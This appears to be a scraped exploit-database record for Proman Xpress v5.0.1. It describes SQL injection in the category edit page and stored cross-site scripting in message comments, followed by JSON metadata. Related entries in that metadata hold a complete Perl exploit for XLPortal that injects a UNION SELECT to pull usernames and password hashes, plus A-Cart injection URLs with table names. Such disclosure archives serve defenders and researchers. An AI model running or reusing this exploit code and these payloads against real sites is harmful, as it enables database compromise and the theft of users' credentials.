Proman Xpress v5.0.1 - Multiple Web Vulnerabilities
2012-05-09T00:00:00
ID 1337DAY-ID-18238 Type zdt Reporter the_storm Modified 2012-05-09T00:00:00
Description
Exploit for php platform in category web applications
Title:
======
Proman Xpress v5.0.1 - Multiple Web Vulnerabilities
Introduction:
=============
Proman Xpress v5.0.1 is a super project management script coded in PHP & MySQL. It s highly customizable and
is used across industries.
No Encryption.
No Callback.
Separate login for clients.
Easy management.
Add/edit/delete projects.
Unlimited project category.
Unlimited image upload.
Ajax based interface.
Complete messaging system.
File attachment system.
Active/ inactive projects.
Assign different parts to staffs.
Client to admin message interface.
Staff to admin message interface.
Set project time period.
Add/edit/delete clients.
Add/edit/delete Staffs.
Template based architecture.
(Copy of the Vendor Homepage: http://itechscripts.com/proman_xpress.html )
Details:
========
1.1
A remote SQL Injection vulnerability is detected in the Promans Xpress 2012 Q2 content management system.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the username post method.
Vulnerable Module(s):
[+] Category Edit [category_edit.php?cid=]
1.2
A persistent input validation vulnerability is detected n the Promans Xpress 2012 Q2 content management system.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action. The bug is located on the comment section of
the message reply function.
Vulnerable Module(s):
[+] Replying for a Message - Comments
# 0day.today [2018-02-19] #
{"published": "2012-05-09T00:00:00", "id": "1337DAY-ID-18238", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:57:02", "bulletin": {"published": "2012-05-09T00:00:00", "id": "1337DAY-ID-18238", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.8, "modified": "2016-04-19T23:57:02"}}, "hash": "542b8e173de36896e6dfe3fd9f48b51eb71b67b7ca41d304749980716f254dba", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T23:57:02", "edition": 1, "title": "Proman Xpress v5.0.1 - Multiple Web Vulnerabilities", "href": "http://0day.today/exploit/description/18238", "modified": "2012-05-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/18238", "references": [], "reporter": "the_storm", "sourceData": "Title:\r\n======\r\nProman Xpress v5.0.1 - Multiple Web Vulnerabilities\r\n\r\nIntroduction:\r\n=============\r\nProman Xpress v5.0.1 is a super project management script coded in PHP & MySQL. It s highly customizable and \r\nis used across industries.\r\n\r\nNo Encryption.\r\nNo Callback.\r\nSeparate login for clients.\r\nEasy management.\r\nAdd/edit/delete projects.\r\nUnlimited project category.\r\nUnlimited image upload.\r\nAjax based interface.\r\nComplete messaging system.\r\nFile attachment system.\r\nActive/ inactive projects.\r\nAssign different parts to staffs.\r\nClient to admin message interface.\r\nStaff to admin message interface.\r\nSet project time period.\r\nAdd/edit/delete clients.\r\nAdd/edit/delete Staffs.\r\nTemplate based architecture.\r\n\r\n(Copy of the Vendor Homepage: http://itechscripts.com/proman_xpress.html )\r\n\r\nDetails:\r\n========\r\n1.1\r\nA remote SQL Injection vulnerability is detected in the Promans Xpress 2012 Q2 content management system.\r\nThe vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands \r\non the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.\r\nThe vulnerability is located on the username post method.\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t\t\t[+] Category Edit [category_edit.php?cid=]\r\n\r\n1.2\r\nA persistent input validation vulnerability is detected n the Promans Xpress 2012 Q2 content management system.\r\nThe bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).\r\nSuccessful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) \r\ncontext manipulation. Exploitation requires low user inter action. The bug is located on the comment section of \r\nthe message reply function.\r\n\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t\t\t[+] Replying for a Message - Comments \r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "bf7c05bb130c348c01b8dd32d4ffb03d", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "02dd8c2ffba45107ee1715012afdf8e4", "key": "modified"}, {"hash": "02dd8c2ffba45107ee1715012afdf8e4", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4ba9b96de110d36a8d918d1873c67dbc", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "4c9bdb58b01e76114d2130aad05323b8", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1421ca45617884f331f7a5c584674171", "key": "sourceHref"}, {"hash": "1ce46c9f214c0acf3e58acbfdd7c1073", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "4af5cafc14b138b431c8b601d883d101a0e43e9a8cc19d80e5dd7b3b2866e057", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-02-19T19:36:29"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-2764"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18238"]}], "modified": "2018-02-19T19:36:29"}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-02-19T19:36:29", "edition": 2, "title": "Proman Xpress v5.0.1 - Multiple Web Vulnerabilities", "href": "https://0day.today/exploit/description/18238", "modified": "2012-05-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/18238", "references": [], "reporter": "the_storm", "sourceData": "Title:\r\n======\r\nProman Xpress v5.0.1 - Multiple Web Vulnerabilities\r\n\r\nIntroduction:\r\n=============\r\nProman Xpress v5.0.1 is a super project management script coded in PHP & MySQL. It s highly customizable and \r\nis used across industries.\r\n\r\nNo Encryption.\r\nNo Callback.\r\nSeparate login for clients.\r\nEasy management.\r\nAdd/edit/delete projects.\r\nUnlimited project category.\r\nUnlimited image upload.\r\nAjax based interface.\r\nComplete messaging system.\r\nFile attachment system.\r\nActive/ inactive projects.\r\nAssign different parts to staffs.\r\nClient to admin message interface.\r\nStaff to admin message interface.\r\nSet project time period.\r\nAdd/edit/delete clients.\r\nAdd/edit/delete Staffs.\r\nTemplate based architecture.\r\n\r\n(Copy of the Vendor Homepage: http://itechscripts.com/proman_xpress.html )\r\n\r\nDetails:\r\n========\r\n1.1\r\nA remote SQL Injection vulnerability is detected in the Promans Xpress 2012 Q2 content management system.\r\nThe vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands \r\non the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.\r\nThe vulnerability is located on the username post method.\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t\t\t[+] Category Edit [category_edit.php?cid=]\r\n\r\n1.2\r\nA persistent input validation vulnerability is detected n the Promans Xpress 2012 Q2 content management system.\r\nThe bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).\r\nSuccessful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) \r\ncontext manipulation. Exploitation requires low user inter action. The bug is located on the comment section of \r\nthe message reply function.\r\n\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t\t\t[+] Replying for a Message - Comments \r\n\r\n\n\n# 0day.today [2018-02-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "ffa7a845d6ab55105de39c5e78653503", "key": "href"}, {"hash": "02dd8c2ffba45107ee1715012afdf8e4", "key": "modified"}, {"hash": "02dd8c2ffba45107ee1715012afdf8e4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4ba9b96de110d36a8d918d1873c67dbc", "key": "reporter"}, {"hash": "003c4617a1d824734ebc9507874f6b61", "key": "sourceData"}, {"hash": "e83e27cb79b93a022709d9c35663e528", "key": "sourceHref"}, {"hash": "bf7c05bb130c348c01b8dd32d4ffb03d", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-04-14T17:47:39", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-03-21T00:00:00", "published": "2008-03-21T00:00:00", "id": "1337DAY-ID-2764", "href": "https://0day.today/exploit/description/2764", "type": "zdt", "title": "XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit", "sourceData": "=======================================================\r\nXLPortal <= 2.2.4 (search) Remote SQL Injection Exploit\r\n=======================================================\r\n\r\n\r\n\r\n\r\n#!D:\\Perl\\Bin\\Perl.exe\r\n\r\nuse LWP::UserAgent;\r\n\r\n#\r\n# XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit\r\n# Coded by cOndemned \r\n# Greetz : irk4z, GregStar, NoRuless, Tomu, Happy B'day Avantura ;*\r\n#\r\n\r\nprint \"\\r\\n[~] XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit\";\r\nprint \"\\r\\n[~] Coded by cOndemned [22.03.2008]\\r\\n\";\r\n\r\nif (@ARGV < 2) {\r\n print \"[~] Usage : $0 <target_host> <pref>\\r\\n\"; # default pref is xlp / xlportal\r\n exit();\r\n}\r\n\r\n$head = new LWP::UserAgent;\r\n$head->agent(\"Opera/9.26 (Windows NT 5.1; U; pl)\");\r\n\r\nmy $request = HTTP::Request->new(POST => $ARGV[0].\"/index.php\");\r\n\r\n\r\n$buff = \"%27+union+select+1%2Cconcat%28user%2C0x3a%2Cpassword%29+from+\".$ARGV[1].\"_users+%2F*\";\r\n$request->content_type('application/x-www-form-urlencoded');\r\n$request->content(\"page=Szukaj&op=Wyszukaj&query=\".$buff.\"§ion_News=1§ion_Download=1&s\".\r\n \"ection_Links=1§ion_Articles=1&exact=any&sort=alpha&=Rozpocznij+wyszukiw\".\r\n \"anie\");\r\n$response = $head->request($request);\r\n\r\nif (($response->content =~ /([a-zA-Z]+?):([0-9,a-f]{32})/)) { \r\n print \"[+] Login : $1\\r\\n\";\r\n print \"[+] Haslo : $2\\r\\n\";\r\n}\r\nelse {\r\n print \"\\r\\n[~] This one isn't vulnerable, or bad data was given\\r\\n\";\r\n exit();\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2764"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "__________________________\r\n\r\nA R I A - S E C U R I T Y \r\n___________________________\r\nA-Cart SQL Injection And Cross-Site Scripting \r\nhttp://alanward.net\r\n\r\nCross Site Scripting:\r\nhttp://localhost/path/error.asp?msg=XSS\r\n\r\nSQL Injection:\r\nhttp://localhost/path/product.asp?productid=' SQL COMMAND\r\n\r\nTable Names are:\r\ncategories\r\ncustomers\r\norderitems\r\norders\r\nproducts\r\nusers (username,fullname,password,privileges)\r\n\r\nCredits Goes To Aria-Security Team \r\nhttp://Aria-Security.Net\r\nThe-0utl4w", "modified": "2007-10-20T00:00:00", "published": "2007-10-20T00:00:00", "id": "SECURITYVULNS:DOC:18238", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18238", "title": "A-Cart SQL Injection And Cross-Site Scripting", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
